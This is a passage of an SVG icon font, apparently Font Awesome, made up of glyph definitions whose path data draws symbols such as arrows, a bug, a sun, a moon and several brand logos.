<glyph unicode="&#xf16d;" d="M1362 110v648h-135q20 -63 20 -131q0 -126 -64 -232.5t-174 -168.5t-240 -62q-197 0 -337 135.5t-140 327.5q0 68 20 131h-141v-648q0 -26 17.5 -43.5t43.5 -17.5h1069q25 0 43 17.5t18 43.5zM1078 643q0 124 -90.5 211.5t-218.5 87.5q-127 0 -217.5 -87.5t-90.5 -211.5 t90.5 -211.5t217.5 -87.5q128 0 218.5 87.5t90.5 211.5zM1362 1003v165q0 28 -20 48.5t-49 20.5h-174q-29 0 -49 -20.5t-20 -48.5v-165q0 -29 20 -49t49 -20h174q29 0 49 20t20 49zM1536 1211v-1142q0 -81 -58 -139t-139 -58h-1142q-81 0 -139 58t-58 139v1142q0 81 58 139 t139 58h1142q81 0 139 -58t58 -139z" />
<glyph unicode="&#xf16e;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM698 640q0 88 -62 150t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150zM1262 640q0 88 -62 150 t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150z" />
<glyph unicode="&#xf170;" d="M768 914l201 -306h-402zM1133 384h94l-459 691l-459 -691h94l104 160h522zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf171;" horiz-adv-x="1408" d="M815 677q8 -63 -50.5 -101t-111.5 -6q-39 17 -53.5 58t-0.5 82t52 58q36 18 72.5 12t64 -35.5t27.5 -67.5zM926 698q-14 107 -113 164t-197 13q-63 -28 -100.5 -88.5t-34.5 -129.5q4 -91 77.5 -155t165.5 -56q91 8 152 84t50 168zM1165 1240q-20 27 -56 44.5t-58 22 t-71 12.5q-291 47 -566 -2q-43 -7 -66 -12t-55 -22t-50 -43q30 -28 76 -45.5t73.5 -22t87.5 -11.5q228 -29 448 -1q63 8 89.5 12t72.5 21.5t75 46.5zM1222 205q-8 -26 -15.5 -76.5t-14 -84t-28.5 -70t-58 -56.5q-86 -48 -189.5 -71.5t-202 -22t-201.5 18.5q-46 8 -81.5 18 t-76.5 27t-73 43.5t-52 61.5q-25 96 -57 292l6 16l18 9q223 -148 506.5 -148t507.5 148q21 -6 24 -23t-5 -45t-8 -37zM1403 1166q-26 -167 -111 -655q-5 -30 -27 -56t-43.5 -40t-54.5 -31q-252 -126 -610 -88q-248 27 -394 139q-15 12 -25.5 26.5t-17 35t-9 34t-6 39.5 t-5.5 35q-9 50 -26.5 150t-28 161.5t-23.5 147.5t-22 158q3 26 17.5 48.5t31.5 37.5t45 30t46 22.5t48 18.5q125 46 313 64q379 37 676 -50q155 -46 215 -122q16 -20 16.5 -51t-5.5 -54z" />
<glyph unicode="&#xf172;" d="M848 666q0 43 -41 66t-77 1q-43 -20 -42.5 -72.5t43.5 -70.5q39 -23 81 4t36 72zM928 682q8 -66 -36 -121t-110 -61t-119 40t-56 113q-2 49 25.5 93t72.5 64q70 31 141.5 -10t81.5 -118zM1100 1073q-20 -21 -53.5 -34t-53 -16t-63.5 -8q-155 -20 -324 0q-44 6 -63 9.5 t-52.5 16t-54.5 32.5q13 19 36 31t40 15.5t47 8.5q198 35 408 1q33 -5 51 -8.5t43 -16t39 -31.5zM1142 327q0 7 5.5 26.5t3 32t-17.5 16.5q-161 -106 -365 -106t-366 106l-12 -6l-5 -12q26 -154 41 -210q47 -81 204 -108q249 -46 428 53q34 19 49 51.5t22.5 85.5t12.5 71z M1272 1020q9 53 -8 75q-43 55 -155 88q-216 63 -487 36q-132 -12 -226 -46q-38 -15 -59.5 -25t-47 -34t-29.5 -54q8 -68 19 -138t29 -171t24 -137q1 -5 5 -31t7 -36t12 -27t22 -28q105 -80 284 -100q259 -28 440 63q24 13 39.5 23t31 29t19.5 40q48 267 80 473zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf173;" horiz-adv-x="1024" d="M944 207l80 -237q-23 -35 -111 -66t-177 -32q-104 -2 -190.5 26t-142.5 74t-95 106t-55.5 120t-16.5 118v544h-168v215q72 26 129 69.5t91 90t58 102t34 99t15 88.5q1 5 4.5 8.5t7.5 3.5h244v-424h333v-252h-334v-518q0 -30 6.5 -56t22.5 -52.5t49.5 -41.5t81.5 -14 q78 2 134 29z" />
<glyph unicode="&#xf174;" d="M1136 75l-62 183q-44 -22 -103 -22q-36 -1 -62 10.5t-38.5 31.5t-17.5 40.5t-5 43.5v398h257v194h-256v326h-188q-8 0 -9 -10q-5 -44 -17.5 -87t-39 -95t-77 -95t-118.5 -68v-165h130v-418q0 -57 21.5 -115t65 -111t121 -85.5t176.5 -30.5q69 1 136.5 25t85.5 50z M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf175;" horiz-adv-x="768" d="M765 237q8 -19 -5 -35l-350 -384q-10 -10 -23 -10q-14 0 -24 10l-355 384q-13 16 -5 35q9 19 29 19h224v1248q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1248h224q21 0 29 -19z" />
<glyph unicode="&#xf176;" horiz-adv-x="768" d="M765 1043q-9 -19 -29 -19h-224v-1248q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1248h-224q-21 0 -29 19t5 35l350 384q10 10 23 10q14 0 24 -10l355 -384q13 -16 5 -35z" />
<glyph unicode="&#xf177;" horiz-adv-x="1792" d="M1792 736v-192q0 -14 -9 -23t-23 -9h-1248v-224q0 -21 -19 -29t-35 5l-384 350q-10 10 -10 23q0 14 10 24l384 354q16 14 35 6q19 -9 19 -29v-224h1248q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf178;" horiz-adv-x="1792" d="M1728 643q0 -14 -10 -24l-384 -354q-16 -14 -35 -6q-19 9 -19 29v224h-1248q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h1248v224q0 21 19 29t35 -5l384 -350q10 -10 10 -23z" />
<glyph unicode="&#xf179;" horiz-adv-x="1408" d="M1393 321q-39 -125 -123 -250q-129 -196 -257 -196q-49 0 -140 32q-86 32 -151 32q-61 0 -142 -33q-81 -34 -132 -34q-152 0 -301 259q-147 261 -147 503q0 228 113 374q112 144 284 144q72 0 177 -30q104 -30 138 -30q45 0 143 34q102 34 173 34q119 0 213 -65 q52 -36 104 -100q-79 -67 -114 -118q-65 -94 -65 -207q0 -124 69 -223t158 -126zM1017 1494q0 -61 -29 -136q-30 -75 -93 -138q-54 -54 -108 -72q-37 -11 -104 -17q3 149 78 257q74 107 250 148q1 -3 2.5 -11t2.5 -11q0 -4 0.5 -10t0.5 -10z" />
<glyph unicode="&#xf17a;" horiz-adv-x="1664" d="M682 530v-651l-682 94v557h682zM682 1273v-659h-682v565zM1664 530v-786l-907 125v661h907zM1664 1408v-794h-907v669z" />
<glyph unicode="&#xf17b;" horiz-adv-x="1408" d="M493 1053q16 0 27.5 11.5t11.5 27.5t-11.5 27.5t-27.5 11.5t-27 -11.5t-11 -27.5t11 -27.5t27 -11.5zM915 1053q16 0 27 11.5t11 27.5t-11 27.5t-27 11.5t-27.5 -11.5t-11.5 -27.5t11.5 -27.5t27.5 -11.5zM103 869q42 0 72 -30t30 -72v-430q0 -43 -29.5 -73t-72.5 -30 t-73 30t-30 73v430q0 42 30 72t73 30zM1163 850v-666q0 -46 -32 -78t-77 -32h-75v-227q0 -43 -30 -73t-73 -30t-73 30t-30 73v227h-138v-227q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73l-1 227h-74q-46 0 -78 32t-32 78v666h918zM931 1255q107 -55 171 -153.5t64 -215.5 h-925q0 117 64 215.5t172 153.5l-71 131q-7 13 5 20q13 6 20 -6l72 -132q95 42 201 42t201 -42l72 132q7 12 20 6q12 -7 5 -20zM1408 767v-430q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73v430q0 43 30 72.5t72 29.5q43 0 73 -29.5t30 -72.5z" />
<glyph unicode="&#xf17c;" d="M663 1125q-11 -1 -15.5 -10.5t-8.5 -9.5q-5 -1 -5 5q0 12 19 15h10zM750 1111q-4 -1 -11.5 6.5t-17.5 4.5q24 11 32 -2q3 -6 -3 -9zM399 684q-4 1 -6 -3t-4.5 -12.5t-5.5 -13.5t-10 -13q-7 -10 -1 -12q4 -1 12.5 7t12.5 18q1 3 2 7t2 6t1.5 4.5t0.5 4v3t-1 2.5t-3 2z M1254 325q0 18 -55 42q4 15 7.5 27.5t5 26t3 21.5t0.5 22.5t-1 19.5t-3.5 22t-4 20.5t-5 25t-5.5 26.5q-10 48 -47 103t-72 75q24 -20 57 -83q87 -162 54 -278q-11 -40 -50 -42q-31 -4 -38.5 18.5t-8 83.5t-11.5 107q-9 39 -19.5 69t-19.5 45.5t-15.5 24.5t-13 15t-7.5 7 q-14 62 -31 103t-29.5 56t-23.5 33t-15 40q-4 21 6 53.5t4.5 49.5t-44.5 25q-15 3 -44.5 18t-35.5 16q-8 1 -11 26t8 51t36 27q37 3 51 -30t4 -58q-11 -19 -2 -26.5t30 -0.5q13 4 13 36v37q-5 30 -13.5 50t-21 30.5t-23.5 15t-27 7.5q-107 -8 -89 -134q0 -15 -1 -15 q-9 9 -29.5 10.5t-33 -0.5t-15.5 5q1 57 -16 90t-45 34q-27 1 -41.5 -27.5t-16.5 -59.5q-1 -15 3.5 -37t13 -37.5t15.5 -13.5q10 3 16 14q4 9 -7 8q-7 0 -15.5 14.5t-9.5 33.5q-1 22 9 37t34 14q17 0 27 -21t9.5 -39t-1.5 -22q-22 -15 -31 -29q-8 -12 -27.5 -23.5 t-20.5 -12.5q-13 -14 -15.5 -27t7.5 -18q14 -8 25 -19.5t16 -19t18.5 -13t35.5 -6.5q47 -2 102 15q2 1 23 7t34.5 10.5t29.5 13t21 17.5q9 14 20 8q5 -3 6.5 -8.5t-3 -12t-16.5 -9.5q-20 -6 -56.5 -21.5t-45.5 -19.5q-44 -19 -70 -23q-25 -5 -79 2q-10 2 -9 -2t17 -19 q25 -23 67 -22q17 1 36 7t36 14t33.5 17.5t30 17t24.5 12t17.5 2.5t8.5 -11q0 -2 -1 -4.5t-4 -5t-6 -4.5t-8.5 -5t-9 -4.5t-10 -5t-9.5 -4.5q-28 -14 -67.5 -44t-66.5 -43t-49 -1q-21 11 -63 73q-22 31 -25 22q-1 -3 -1 -10q0 -25 -15 -56.5t-29.5 -55.5t-21 -58t11.5 -63 q-23 -6 -62.5 -90t-47.5 -141q-2 -18 -1.5 -69t-5.5 -59q-8 -24 -29 -3q-32 31 -36 94q-2 28 4 56q4 19 -1 18l-4 -5q-36 -65 10 -166q5 -12 25 -28t24 -20q20 -23 104 -90.5t93 -76.5q16 -15 17.5 -38t-14 -43t-45.5 -23q8 -15 29 -44.5t28 -54t7 -70.5q46 24 7 92 q-4 8 -10.5 16t-9.5 12t-2 6q3 5 13 9.5t20 -2.5q46 -52 166 -36q133 15 177 87q23 38 34 30q12 -6 10 -52q-1 -25 -23 -92q-9 -23 -6 -37.5t24 -15.5q3 19 14.5 77t13.5 90q2 21 -6.5 73.5t-7.5 97t23 70.5q15 18 51 18q1 37 34.5 53t72.5 10.5t60 -22.5zM626 1152 q3 17 -2.5 30t-11.5 15q-9 2 -9 -7q2 -5 5 -6q10 0 7 -15q-3 -20 8 -20q3 0 3 3zM1045 955q-2 8 -6.5 11.5t-13 5t-14.5 5.5q-5 3 -9.5 8t-7 8t-5.5 6.5t-4 4t-4 -1.5q-14 -16 7 -43.5t39 -31.5q9 -1 14.5 8t3.5 20zM867 1168q0 11 -5 19.5t-11 12.5t-9 3q-14 -1 -7 -7l4 -2 q14 -4 18 -31q0 -3 8 2zM921 1401q0 2 -2.5 5t-9 7t-9.5 6q-15 15 -24 15q-9 -1 -11.5 -7.5t-1 -13t-0.5 -12.5q-1 -4 -6 -10.5t-6 -9t3 -8.5q4 -3 8 0t11 9t15 9q1 1 9 1t15 2t9 7zM1486 60q20 -12 31 -24.5t12 -24t-2.5 -22.5t-15.5 -22t-23.5 -19.5t-30 -18.5 t-31.5 -16.5t-32 -15.5t-27 -13q-38 -19 -85.5 -56t-75.5 -64q-17 -16 -68 -19.5t-89 14.5q-18 9 -29.5 23.5t-16.5 25.5t-22 19.5t-47 9.5q-44 1 -130 1q-19 0 -57 -1.5t-58 -2.5q-44 -1 -79.5 -15t-53.5 -30t-43.5 -28.5t-53.5 -11.5q-29 1 -111 31t-146 43q-19 4 -51 9.5 t-50 9t-39.5 9.5t-33.5 14.5t-17 19.5q-10 23 7 66.5t18 54.5q1 16 -4 40t-10 42.5t-4.5 36.5t10.5 27q14 12 57 14t60 12q30 18 42 35t12 51q21 -73 -32 -106q-32 -20 -83 -15q-34 3 -43 -10q-13 -15 5 -57q2 -6 8 -18t8.5 -18t4.5 -17t1 -22q0 -15 -17 -49t-14 -48 q3 -17 37 -26q20 -6 84.5 -18.5t99.5 -20.5q24 -6 74 -22t82.5 -23t55.5 -4q43 6 64.5 28t23 48t-7.5 58.5t-19 52t-20 36.5q-121 190 -169 242q-68 74 -113 40q-11 -9 -15 15q-3 16 -2 38q1 29 10 52t24 47t22 42q8 21 26.5 72t29.5 78t30 61t39 54q110 143 124 195 q-12 112 -16 310q-2 90 24 151.5t106 104.5q39 21 104 21q53 1 106 -13.5t89 -41.5q57 -42 91.5 -121.5t29.5 -147.5q-5 -95 30 -214q34 -113 133 -218q55 -59 99.5 -163t59.5 -191q8 -49 5 -84.5t-12 -55.5t-20 -22q-10 -2 -23.5 -19t-27 -35.5t-40.5 -33.5t-61 -14 q-18 1 -31.5 5t-22.5 13.5t-13.5 15.5t-11.5 20.5t-9 19.5q-22 37 -41 30t-28 -49t7 -97q20 -70 1 -195q-10 -65 18 -100.5t73 -33t85 35.5q59 49 89.5 66.5t103.5 42.5q53 18 77 36.5t18.5 34.5t-25 28.5t-51.5 23.5q-33 11 -49.5 48t-15 72.5t15.5 47.5q1 -31 8 -56.5 t14.5 -40.5t20.5 -28.5t21 -19t21.5 -13t16.5 -9.5z" />
<glyph unicode="&#xf17d;" d="M1024 36q-42 241 -140 498h-2l-2 -1q-16 -6 -43 -16.5t-101 -49t-137 -82t-131 -114.5t-103 -148l-15 11q184 -150 418 -150q132 0 256 52zM839 643q-21 49 -53 111q-311 -93 -673 -93q-1 -7 -1 -21q0 -124 44 -236.5t124 -201.5q50 89 123.5 166.5t142.5 124.5t130.5 81 t99.5 48l37 13q4 1 13 3.5t13 4.5zM732 855q-120 213 -244 378q-138 -65 -234 -186t-128 -272q302 0 606 80zM1416 536q-210 60 -409 29q87 -239 128 -469q111 75 185 189.5t96 250.5zM611 1277q-1 0 -2 -1q1 1 2 1zM1201 1132q-185 164 -433 164q-76 0 -155 -19 q131 -170 246 -382q69 26 130 60.5t96.5 61.5t65.5 57t37.5 40.5zM1424 647q-3 232 -149 410l-1 -1q-9 -12 -19 -24.5t-43.5 -44.5t-71 -60.5t-100 -65t-131.5 -64.5q25 -53 44 -95q2 -6 6.5 -17.5t7.5 -16.5q36 5 74.5 7t73.5 2t69 -1.5t64 -4t56.5 -5.5t48 -6.5t36.5 -6 t25 -4.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf17e;" d="M1173 473q0 50 -19.5 91.5t-48.5 68.5t-73 49t-82.5 34t-87.5 23l-104 24q-30 7 -44 10.5t-35 11.5t-30 16t-16.5 21t-7.5 30q0 77 144 77q43 0 77 -12t54 -28.5t38 -33.5t40 -29t48 -12q47 0 75.5 32t28.5 77q0 55 -56 99.5t-142 67.5t-182 23q-68 0 -132 -15.5 t-119.5 -47t-89 -87t-33.5 -128.5q0 -61 19 -106.5t56 -75.5t80 -48.5t103 -32.5l146 -36q90 -22 112 -36q32 -20 32 -60q0 -39 -40 -64.5t-105 -25.5q-51 0 -91.5 16t-65 38.5t-45.5 45t-46 38.5t-54 16q-50 0 -75.5 -30t-25.5 -75q0 -92 122 -157.5t291 -65.5 q73 0 140 18.5t122.5 53.5t88.5 93.5t33 131.5zM1536 256q0 -159 -112.5 -271.5t-271.5 -112.5q-130 0 -234 80q-77 -16 -150 -16q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5q0 73 16 150q-80 104 -80 234q0 159 112.5 271.5t271.5 112.5q130 0 234 -80 q77 16 150 16q143 0 273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -73 -16 -150q80 -104 80 -234z" />
<glyph unicode="&#xf180;" horiz-adv-x="1280" d="M1000 1102l37 194q5 23 -9 40t-35 17h-712q-23 0 -38.5 -17t-15.5 -37v-1101q0 -7 6 -1l291 352q23 26 38 33.5t48 7.5h239q22 0 37 14.5t18 29.5q24 130 37 191q4 21 -11.5 40t-36.5 19h-294q-29 0 -48 19t-19 48v42q0 29 19 47.5t48 18.5h346q18 0 35 13.5t20 29.5z M1227 1324q-15 -73 -53.5 -266.5t-69.5 -350t-35 -173.5q-6 -22 -9 -32.5t-14 -32.5t-24.5 -33t-38.5 -21t-58 -10h-271q-13 0 -22 -10q-8 -9 -426 -494q-22 -25 -58.5 -28.5t-48.5 5.5q-55 22 -55 98v1410q0 55 38 102.5t120 47.5h888q95 0 127 -53t10 -159zM1227 1324 l-158 -790q4 17 35 173.5t69.5 350t53.5 266.5z" />
<glyph unicode="&#xf181;" d="M704 192v1024q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-1024q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1376 576v640q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-640q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408 q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf182;" horiz-adv-x="1280" d="M1280 480q0 -40 -28 -68t-68 -28q-51 0 -80 43l-227 341h-45v-132l247 -411q9 -15 9 -33q0 -26 -19 -45t-45 -19h-192v-272q0 -46 -33 -79t-79 -33h-160q-46 0 -79 33t-33 79v272h-192q-26 0 -45 19t-19 45q0 18 9 33l247 411v132h-45l-227 -341q-29 -43 -80 -43 q-40 0 -68 28t-28 68q0 29 16 53l256 384q73 107 176 107h384q103 0 176 -107l256 -384q16 -24 16 -53zM864 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
<glyph unicode="&#xf183;" horiz-adv-x="1024" d="M1024 832v-416q0 -40 -28 -68t-68 -28t-68 28t-28 68v352h-64v-912q0 -46 -33 -79t-79 -33t-79 33t-33 79v464h-64v-464q0 -46 -33 -79t-79 -33t-79 33t-33 79v912h-64v-352q0 -40 -28 -68t-68 -28t-68 28t-28 68v416q0 80 56 136t136 56h640q80 0 136 -56t56 -136z M736 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
<glyph unicode="&#xf184;" d="M773 234l350 473q16 22 24.5 59t-6 85t-61.5 79q-40 26 -83 25.5t-73.5 -17.5t-54.5 -45q-36 -40 -96 -40q-59 0 -95 40q-24 28 -54.5 45t-73.5 17.5t-84 -25.5q-46 -31 -60.5 -79t-6 -85t24.5 -59zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf185;" horiz-adv-x="1792" d="M1472 640q0 117 -45.5 223.5t-123 184t-184 123t-223.5 45.5t-223.5 -45.5t-184 -123t-123 -184t-45.5 -223.5t45.5 -223.5t123 -184t184 -123t223.5 -45.5t223.5 45.5t184 123t123 184t45.5 223.5zM1748 363q-4 -15 -20 -20l-292 -96v-306q0 -16 -13 -26q-15 -10 -29 -4 l-292 94l-180 -248q-10 -13 -26 -13t-26 13l-180 248l-292 -94q-14 -6 -29 4q-13 10 -13 26v306l-292 96q-16 5 -20 20q-5 17 4 29l180 248l-180 248q-9 13 -4 29q4 15 20 20l292 96v306q0 16 13 26q15 10 29 4l292 -94l180 248q9 12 26 12t26 -12l180 -248l292 94 q14 6 29 -4q13 -10 13 -26v-306l292 -96q16 -5 20 -20q5 -16 -4 -29l-180 -248l180 -248q9 -12 4 -29z" />
<glyph unicode="&#xf186;" d="M1262 233q-54 -9 -110 -9q-182 0 -337 90t-245 245t-90 337q0 192 104 357q-201 -60 -328.5 -229t-127.5 -384q0 -130 51 -248.5t136.5 -204t204 -136.5t248.5 -51q144 0 273.5 61.5t220.5 171.5zM1465 318q-94 -203 -283.5 -324.5t-413.5 -121.5q-156 0 -298 61 t-245 164t-164 245t-61 298q0 153 57.5 292.5t156 241.5t235.5 164.5t290 68.5q44 2 61 -39q18 -41 -15 -72q-86 -78 -131.5 -181.5t-45.5 -218.5q0 -148 73 -273t198 -198t273 -73q118 0 228 51q41 18 72 -13q14 -14 17.5 -34t-4.5 -38z" />
<glyph unicode="&#xf187;" horiz-adv-x="1792" d="M1088 704q0 26 -19 45t-45 19h-256q-26 0 -45 -19t-19 -45t19 -45t45 -19h256q26 0 45 19t19 45zM1664 896v-960q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v960q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1728 1344v-256q0 -26 -19 -45t-45 -19h-1536 q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1536q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf188;" horiz-adv-x="1664" d="M1632 576q0 -26 -19 -45t-45 -19h-224q0 -171 -67 -290l208 -209q19 -19 19 -45t-19 -45q-18 -19 -45 -19t-45 19l-198 197q-5 -5 -15 -13t-42 -28.5t-65 -36.5t-82 -29t-97 -13v896h-128v-896q-51 0 -101.5 13.5t-87 33t-66 39t-43.5 32.5l-15 14l-183 -207 q-20 -21 -48 -21q-24 0 -43 16q-19 18 -20.5 44.5t15.5 46.5l202 227q-58 114 -58 274h-224q-26 0 -45 19t-19 45t19 45t45 19h224v294l-173 173q-19 19 -19 45t19 45t45 19t45 -19l173 -173h844l173 173q19 19 45 19t45 -19t19 -45t-19 -45l-173 -173v-294h224q26 0 45 -19 t19 -45zM1152 1152h-640q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5z" />
<glyph unicode="&#xf189;" horiz-adv-x="1920" d="M1917 1016q23 -64 -150 -294q-24 -32 -65 -85q-78 -100 -90 -131q-17 -41 14 -81q17 -21 81 -82h1l1 -1l1 -1l2 -2q141 -131 191 -221q3 -5 6.5 -12.5t7 -26.5t-0.5 -34t-25 -27.5t-59 -12.5l-256 -4q-24 -5 -56 5t-52 22l-20 12q-30 21 -70 64t-68.5 77.5t-61 58 t-56.5 15.5q-3 -1 -8 -3.5t-17 -14.5t-21.5 -29.5t-17 -52t-6.5 -77.5q0 -15 -3.5 -27.5t-7.5 -18.5l-4 -5q-18 -19 -53 -22h-115q-71 -4 -146 16.5t-131.5 53t-103 66t-70.5 57.5l-25 24q-10 10 -27.5 30t-71.5 91t-106 151t-122.5 211t-130.5 272q-6 16 -6 27t3 16l4 6 q15 19 57 19l274 2q12 -2 23 -6.5t16 -8.5l5 -3q16 -11 24 -32q20 -50 46 -103.5t41 -81.5l16 -29q29 -60 56 -104t48.5 -68.5t41.5 -38.5t34 -14t27 5q2 1 5 5t12 22t13.5 47t9.5 81t0 125q-2 40 -9 73t-14 46l-6 12q-25 34 -85 43q-13 2 5 24q17 19 38 30q53 26 239 24 q82 -1 135 -13q20 -5 33.5 -13.5t20.5 -24t10.5 -32t3.5 -45.5t-1 -55t-2.5 -70.5t-1.5 -82.5q0 -11 -1 -42t-0.5 -48t3.5 -40.5t11.5 -39t22.5 -24.5q8 -2 17 -4t26 11t38 34.5t52 67t68 107.5q60 104 107 225q4 10 10 17.5t11 10.5l4 3l5 2.5t13 3t20 0.5l288 2 q39 5 64 -2.5t31 -16.5z" />
<glyph unicode="&#xf18a;" horiz-adv-x="1792" d="M675 252q21 34 11 69t-45 50q-34 14 -73 1t-60 -46q-22 -34 -13 -68.5t43 -50.5t74.5 -2.5t62.5 47.5zM769 373q8 13 3.5 26.5t-17.5 18.5q-14 5 -28.5 -0.5t-21.5 -18.5q-17 -31 13 -45q14 -5 29 0.5t22 18.5zM943 266q-45 -102 -158 -150t-224 -12 q-107 34 -147.5 126.5t6.5 187.5q47 93 151.5 139t210.5 19q111 -29 158.5 -119.5t2.5 -190.5zM1255 426q-9 96 -89 170t-208.5 109t-274.5 21q-223 -23 -369.5 -141.5t-132.5 -264.5q9 -96 89 -170t208.5 -109t274.5 -21q223 23 369.5 141.5t132.5 264.5zM1563 422 q0 -68 -37 -139.5t-109 -137t-168.5 -117.5t-226 -83t-270.5 -31t-275 33.5t-240.5 93t-171.5 151t-65 199.5q0 115 69.5 245t197.5 258q169 169 341.5 236t246.5 -7q65 -64 20 -209q-4 -14 -1 -20t10 -7t14.5 0.5t13.5 3.5l6 2q139 59 246 59t153 -61q45 -63 0 -178 q-2 -13 -4.5 -20t4.5 -12.5t12 -7.5t17 -6q57 -18 103 -47t80 -81.5t34 -116.5zM1489 1046q42 -47 54.5 -108.5t-6.5 -117.5q-8 -23 -29.5 -34t-44.5 -4q-23 8 -34 29.5t-4 44.5q20 63 -24 111t-107 35q-24 -5 -45 8t-25 37q-5 24 8 44.5t37 25.5q60 13 119 -5.5t101 -65.5z M1670 1209q87 -96 112.5 -222.5t-13.5 -241.5q-9 -27 -34 -40t-52 -4t-40 34t-5 52q28 82 10 172t-80 158q-62 69 -148 95.5t-173 8.5q-28 -6 -52 9.5t-30 43.5t9.5 51.5t43.5 29.5q123 26 244 -11.5t208 -134.5z" />
<glyph unicode="&#xf18b;" d="M1133 -34q-171 -94 -368 -94q-196 0 -367 94q138 87 235.5 211t131.5 268q35 -144 132.5 -268t235.5 -211zM638 1394v-485q0 -252 -126.5 -459.5t-330.5 -306.5q-181 215 -181 495q0 187 83.5 349.5t229.5 269.5t325 137zM1536 638q0 -280 -181 -495 q-204 99 -330.5 306.5t-126.5 459.5v485q179 -30 325 -137t229.5 -269.5t83.5 -349.5z" />
<glyph unicode="&#xf18c;" horiz-adv-x="1408" d="M1402 433q-32 -80 -76 -138t-91 -88.5t-99 -46.5t-101.5 -14.5t-96.5 8.5t-86.5 22t-69.5 27.5t-46 22.5l-17 10q-113 -228 -289.5 -359.5t-384.5 -132.5q-19 0 -32 13t-13 32t13 31.5t32 12.5q173 1 322.5 107.5t251.5 294.5q-36 -14 -72 -23t-83 -13t-91 2.5t-93 28.5 t-92 59t-84.5 100t-74.5 146q114 47 214 57t167.5 -7.5t124.5 -56.5t88.5 -77t56.5 -82q53 131 79 291q-7 -1 -18 -2.5t-46.5 -2.5t-69.5 0.5t-81.5 10t-88.5 23t-84 42.5t-75 65t-54.5 94.5t-28.5 127.5q70 28 133.5 36.5t112.5 -1t92 -30t73.5 -50t56 -61t42 -63t27.5 -56 t16 -39.5l4 -16q12 122 12 195q-8 6 -21.5 16t-49 44.5t-63.5 71.5t-54 93t-33 112.5t12 127t70 138.5q73 -25 127.5 -61.5t84.5 -76.5t48 -85t20.5 -89t-0.5 -85.5t-13 -76.5t-19 -62t-17 -42l-7 -15q1 -5 1 -50.5t-1 -71.5q3 7 10 18.5t30.5 43t50.5 58t71 55.5t91.5 44.5 t112 14.5t132.5 -24q-2 -78 -21.5 -141.5t-50 -104.5t-69.5 -71.5t-81.5 -45.5t-84.5 -24t-80 -9.5t-67.5 1t-46.5 4.5l-17 3q-23 -147 -73 -283q6 7 18 18.5t49.5 41t77.5 52.5t99.5 42t117.5 20t129 -23.5t137 -77.5z" />
<glyph unicode="&#xf18d;" horiz-adv-x="1280" d="M1259 283v-66q0 -85 -57.5 -144.5t-138.5 -59.5h-57l-260 -269v269h-529q-81 0 -138.5 59.5t-57.5 144.5v66h1238zM1259 609v-255h-1238v255h1238zM1259 937v-255h-1238v255h1238zM1259 1077v-67h-1238v67q0 84 57.5 143.5t138.5 59.5h846q81 0 138.5 -59.5t57.5 -143.5z " />
<glyph unicode="&#xf18e;" d="M1152 640q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192h-352q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h352v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198 t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
